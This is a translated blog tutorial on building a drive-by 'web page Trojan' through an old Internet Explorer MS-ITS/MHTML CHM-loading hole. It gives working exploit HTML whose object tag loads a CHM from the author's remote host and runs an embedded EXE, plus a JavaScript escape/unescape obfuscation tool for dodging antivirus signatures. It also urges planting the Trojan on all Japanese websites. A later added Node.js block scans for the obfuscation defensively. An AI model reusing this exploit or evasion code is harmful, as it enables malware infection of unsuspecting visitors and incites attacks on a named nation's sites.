Creating the ultimate webpage Trojan is worth reading!

Source: Internet
Author: User

If you open this page and see a window similar to the one below, congratulations: you have a "hole" ^o^

Please note: this article was published in July. By now the Trojan described here is detected by all anti-virus products, and Microsoft has released patches for this vulnerability for the various OS versions, so the Trojan has basically stopped working. Please do not try it again. The purpose of this article is to provide learning and test material for interested users.

This vulnerability has been known for more than a day or two. Microsoft and some security organizations had not published it, citing user safety and other factors; only recently has it been found that more and more web pages use it to bundle Trojans. The Computer Emergency Readiness Team (CERT) has now officially announced the latest Microsoft Internet Explorer vulnerability. At present there is no complete fix: even if a user takes some protective measures, the risk cannot be entirely avoided. By exploiting this vulnerability, an intruder can trick IE's InfoTech Storage (ITS) protocol handler into fetching script from another domain and running it with the same privileges as the Local zone on the target computer. CERT points out that an intruder can make a visitor execute such a script through a specially crafted URL, and thereby obtain other people's credit card information or even paralyze an entire network. The vulnerability works as follows: IE references an inaccessible or nonexistent MHTML file through its ITS or MHTML protocol; when IE cannot find the Compiled HTML Help (CHM) file it asked for, the ITS protocol handler can be spoofed into loading a CHM file from another domain. An intruder can therefore craft a CHM file containing script that executes from that other domain, and IE's cross-domain security model is broken.

Without further ado, straight to the topic. It is very simple to implement; I believe anyone who understands HTML can do it by hand.

Step 1: Write a web page that automatically runs an EXE file. The file content is very simple, as follows:

<body onmouseup="document.selection.empty()" oncontextmenu="return false" onselectstart="return false" ondragstart="return false" onbeforecopy="return false" oncopy="document.selection.empty()" onselect="document.selection.empty()">
<object id="runit" codebase="iepack.exe" type="application/x-oleobject" height="0" width="0"></object>

The body tag implements some access control: it blocks mouse selection, right-click, drag and drop, and copying. The second tag is the code that loads the EXE: it loads a binary file with the object tag. Note that the type here is "application/x-oleobject", and the code above attaches an executable named "iepack.exe" to the object. If you open this HTML file directly, you will find that the EXE also magically runs. Clever readers will already have seen something.

Step 2: Save the above code as a file, tentatively named "chm.html", and put the EXE file referenced in the object tag in the same directory as the web page. Don't expect it to run this way: IE will not actively download executable files from the server. Of course there are solutions. Find a CHM production tool; once you compile this page together with the EXE file into a CHM file and open the CHM file, you will find the EXE runs just the same. Here I recommend EasyCHM for its ease of use; search for it yourself.

Step 3: This step is the most critical; this is where the vulnerability is exploited!

Create an HTM file mm.htm and write the following code:

<body onmouseup="document.selection.empty()" oncontextmenu="return false" onselectstart="return false" ondragstart="return false" onbeforecopy="return false" oncopy="document.selection.empty()" onselect="document.selection.empty()">
<textarea id="code" style="display: none">
<object data="ms-its:mhtml:file://C:/foo.mht!${path}/help.chm::/chm.html" type="text/x-scriptlet"></object>
</textarea>
<script language="JavaScript">
document.write(code.value.replace(/\$\{path\}/g, location.href.substring(0, location.href.indexOf('chm.html'))));
</script>
<object type="text/x-scriptlet" data="ms-its:mhtml:file://C:/foo.mht!http://duduwolf.winzheng.com/public/IEpack/help.chm::/chm.html"></object>

If it looks messy, copy the code above into an HTM editor to view it; it is much easier that way. The first tag, body, is the same as before. The second is the textarea tag. Note that it contains an object tag that uses IE's MS-ITS vulnerability: the value of data is a file path using the MS-ITS protocol. The ${path} is just a placeholder to fool the eye. Then comes the third tag, a JavaScript script, which takes the value in the textarea (that is, the <object...></object>) and replaces characters in it: what gets substituted for ${path} is everything in the current URL before the file name. You may wonder why we replace it here; can't I just write it directly? Of course not!!
Because once IE has opened this page, nobody knows where it has put the local temporary copy of it, and if you don't know the location you of course cannot run it. The script therefore obtains the full path of the local temporary page: location.href returns the full path and file name of the current page, so with substring and replace you easily get the directory, and from that the full path of the CHM file. Oh, I forgot to mention the key to this IE vulnerability: the client (IE) automatically downloads the CHM file from the server (sorry, how could I forget the most critical technique...).
As for the "ms-its:mhtml:file://C:/foo.mht!" that appears twice in the code, this is the specific MS-ITS format. What does it mean? I haven't studied it yet; I'll tell you when I know :)

Step 4: Haha, your brand-new web page Trojan is finished, but don't be too happy. According to my tests today, Norton, Symantec, McAfee and Rising (other anti-virus products I don't have installed, so I can't say) all successfully intercept this web page Trojan. Don't be discouraged; since I have written this article, there must be a way around it. Anti-virus scanning is very simple: open the file in binary or text mode (for a script virus) and look for the specific virus signature. My estimate is that most anti-virus products look for the line "ms-its:mhtml:file://C:/foo.mht!" or something related to it. I have not tested this, so we simply avoid having that string in the source code in order to dodge the anti-virus software. There are many ways to do so; I use string encryption in the JavaScript script. The encryption function is built into JavaScript: escape(src) encrypts and unescape(src) decrypts, and each returns the encrypted/decrypted string. Here I give you a ready-made tool: copy the following code into an HTM file and open it with IE. The rest, anyone on Earth can do without me! Publish the well-designed web page on the Internet and wait for someone to take the bait (too dark? a bit sinister? Why not? I never heard the crow say I was a hacker...)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><link
href="http://a0759.nease.net/images/css.css" type="text/css" rel="stylesheet">
<script language="JavaScript">
<!--
var i = 0;
var ie = (document.all) ? 1 : 0;
var ns = (document.layers) ? 1 : 0;

function initStyleElements() /* styles for buttons init */
{
  var c = document.pad;
  if (ie)
  {
    // c.text.style.backgroundColor = "#dddddd";
    c.compileit.style.backgroundColor = "#c0c0a8";
    c.compileit.style.cursor = "hand";
    c.select.style.backgroundColor = "#c0c0a8";
    c.select.style.cursor = "hand";
    c.view.style.backgroundColor = "#c0c0a8";
    c.view.style.cursor = "hand";
    c.retur.style.backgroundColor = "#c0c0a8";
    c.retur.style.cursor = "hand";
    c.clear.style.backgroundColor = "#c0c0a8";
    c.clear.style.cursor = "hand";
  }
  else return;
}

/* Button highlighting of the "Compilation" panel */
function lightOn(what)
{
  if (ie) what.style.backgroundColor = '#e0e0d0';
  else return;
}
function focusOn(what)
{
  if (ie) what.style.backgroundColor = '#ebebeb';
  else return;
}
function lightOut(what)
{
  if (ie) what.style.backgroundColor = '#c0c0a8';
  else return;
}
function focusOff(what)
{
  if (ie) what.style.backgroundColor = '#dddddd';
  else return;
}
/* Button highlighting of the "Compilation" panel */

function generate() /* generation of the "Compilation" */
{
  code = document.pad.text.value;
  if (code)
  {
    document.pad.text.value = 'Generating encrypted code. Please wait!';
    setTimeout("compile()", 1000);
  }
  else alert('Enter the source code first')
}
function compile() /* the "Compilation": wrap the escaped source in a self-decoding script */
{
  document.pad.text.value = '';
  compilation = escape(code);
  document.pad.text.value = "<SCRIPT>\n<!--\ndocument.write(unescape(\"" + compilation + "\"));\n// -->\n<\/SCRIPT>";
  i++;
  alert("Page encrypted " + i + " times!");
}
function selectCode() /* selecting the "Compilation" for copying */
{
  if (document.pad.text.value.length > 0)
  {
    document.pad.text.focus();
    document.pad.text.select();
  }
  else alert('No text to select!')
}
function preview() /* preview of the "Compilation" */
{
  if (document.pad.text.value.length > 0)
  {
    pr = window.open("", "preview", "scrollbars=1,menubar=1,status=1,width=700,height=320,left=50,top=110");
    pr.document.write(document.pad.text.value);
  }
  else alert('No text content to preview!')
}
function uncompile() /* decompiling a "Compilation": one unescape pass */
{
  if (document.pad.text.value.length > 0)
  {
    source = unescape(document.pad.text.value);
    document.pad.text.value = "" + source + "";
  }
  else alert('You need to generate the encrypted code before you can retrieve the source code!')
}
// -->
</script>

<script language="JavaScript" type="text/javascript">
<!--
function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
// -->
</script>

<meta content="MSHTML 6.00.2800.1106" name="GENERATOR"><body text="#000000" bgcolor="#ffffff"
onload="MM_preloadImages('../images/close.gif')">
<table cellspacing="0" cellpadding="0" width="500" align="center" border="0">
<tbody>
<tr>
<th>Web page code encryption and decryption tool</th></tr>
<tr>
<td>
<hr width="95%" noshade size="1">
</td></tr>
<tr>
<td>
<form name="pad" method="post" align="center"><textarea class="v9pt" style="width: 100%; background-color: #ebebeb" name="text" rows="15" cols="100"></textarea>
<br><input onmouseover="lightOn(this)" onclick="generate()" onmouseout="lightOut(this)" type="button" value="Encrypt code" name="compileit">
<input onmouseover="lightOn(this)" onclick="selectCode()" onmouseout="lightOut(this)" type="button" value="Select all code" name="select">
<input onmouseover="lightOn(this)" onclick="preview()" onmouseout="lightOut(this)" type="button" value="Preview page" name="view">
<input onmouseover="lightOn(this)" onclick="uncompile()" onmouseout="lightOut(this)" type="button" value="Original code" name="retur">
<input onmouseover="lightOn(this)" onmouseout="lightOut(this)" type="reset" value="Clear" name="clear">
</form></td></tr>
<tr>
<td align="middle"><a
onmouseover="MM_swapImage('Image2','','../images/close.gif',1)"
onmouseout="MM_swapImgRestore()" href="javascript:window.close()"><img height="18" src="http://a0759.nease.net/images/Close-1.gif" width="52"
border="0" name="Image2"></a></td></tr></tbody></table></body></html>

I forgot to explain the code above: I also pulled it from the Internet, and I forgot to thank the author for providing such a useful tool!! Another thing to note: there is no limit on the number of encryption passes. Click encrypt once, then encrypt again; if you don't mind the trouble, add a few more passes, but this slows down page parsing, since the page is decrypted layer by layer and several passes are needed. I encrypted it three times in the test program; I believe nobody on Earth can read it after encryption :)
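As an added example that is not the article's tool or its author's code, the following Node.js script takes the scanner's side of the cat-and-mouse described in Step 4 and just above: it peels the escape()/unescape() layers off a page before looking for the "ms-its:mhtml:file://" marker, so the marker is found no matter how many times the encrypt button was clicked. The sample page, the placeholder host and file names, and the function names are all constructed for this example.

```javascript
// Added example, not code from the article: scanner-side unwrapping of the
// document.write(unescape("...")) layers the article's tool produces.
// Node.js exposes the legacy escape()/unescape() globals that tool relies on.

// Marker the article says signature scanners keyed on.  Once a page is
// wrapped in unescape(), each ':' becomes %3A and a raw text match fails.
const ITS_SIGNATURE = /ms-its:mhtml:file:\/\//i;

// Shape of one layer emitted by the tool's compile() function.  escape()
// never leaves a double quote in its output, so [^"]* captures the blob.
const LAYER_RE = /document\.write\(unescape\("([^"]*)"\)\)/i;

// Repeatedly unwrap layers; maxLayers bounds the work on hostile input.
// Returns the innermost content and the number of layers removed.
function peelLayers(html, maxLayers = 16) {
  let content = html;
  let layers = 0;
  while (layers < maxLayers) {
    const m = LAYER_RE.exec(content);
    if (!m) break;
    content = unescape(m[1]);
    layers += 1;
  }
  return { content, layers };
}

// Verdict for a page: is the marker visible before and/or after unwrapping?
function scanPage(html) {
  const { content, layers } = peelLayers(html);
  return {
    matchedRaw: ITS_SIGNATURE.test(html),     // what a raw-text scanner sees
    suspicious: ITS_SIGNATURE.test(content),  // what we see after peeling
    layers,
  };
}

// Constructed sample: wrap a marker-bearing snippet the way the tool does
// when its encrypt button is clicked `times` times (the article: three).
function wrapLikeTool(src, times) {
  let out = src;
  for (let n = 0; n < times; n++) {
    out = '<SCRIPT>\n<!--\ndocument.write(unescape("' + escape(out) + '"));\n// -->\n</SCRIPT>';
  }
  return out;
}

// Placeholder host and file names; only the protocol prefix matters here.
const SAMPLE_INNER = '<object type="text/x-scriptlet" data="ms-its:mhtml:file://C:/x.mht!http://example.invalid/h.chm::/h.html"></object>';
const SAMPLE_PAGE = wrapLikeTool(SAMPLE_INNER, 3);
```

Running scanPage(SAMPLE_PAGE) reports three layers, no raw match, and a suspicious verdict; the same check on a page without the wrapper reports zero layers.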

Patch: at present Microsoft has not provided a complete solution. To be safe, we recommend that you manually modify the registry to block this vulnerability:
Open the registry editor, go to the key HKEY_CLASSES_ROOT\PROTOCOLS\Handler, and rename the ms-its key under it, for example to ms-its.bak. If a form like the one described at the beginning of the article pops up when you browse this page, you can click that button directly to achieve the same result.

Postscript: The purpose of this article is to let everyone know how this terrible web page Trojan was born and what people have built with it; this Trojan is also the result of careful study after I got infected and used tools to open the source code layer by layer. Finally, I recommend several tools for analyzing web pages. The first is MyIE2. The browser itself is decent, but what I am praising is a third-party plug-in I installed: ViewPage. This plug-in is amazing: it quickly displays the current page's attributes, image resources, source code, Flash, link list, CSS, scripts and so on. With it you can quickly learn how web pages are "refined". The second is the EditPlus text editor, which is simply too easy to use..... The third is MySpy, written by aweay, moderator of the BCB board on CSDN; I use it to view the source code of CHM files. Search for these tools yourself if you need them.

Today is the Lugouqiao Incident day. Do not forget your national shame! Add this Trojan Horse to all websites in Japan...

Mail: duduwolf@hotmail.com
QQ: 977257
http://duduwolf.winzheng.com
http://blog.csdn.net/duduwolf

Written by Duduwolf on the evening of July 7.
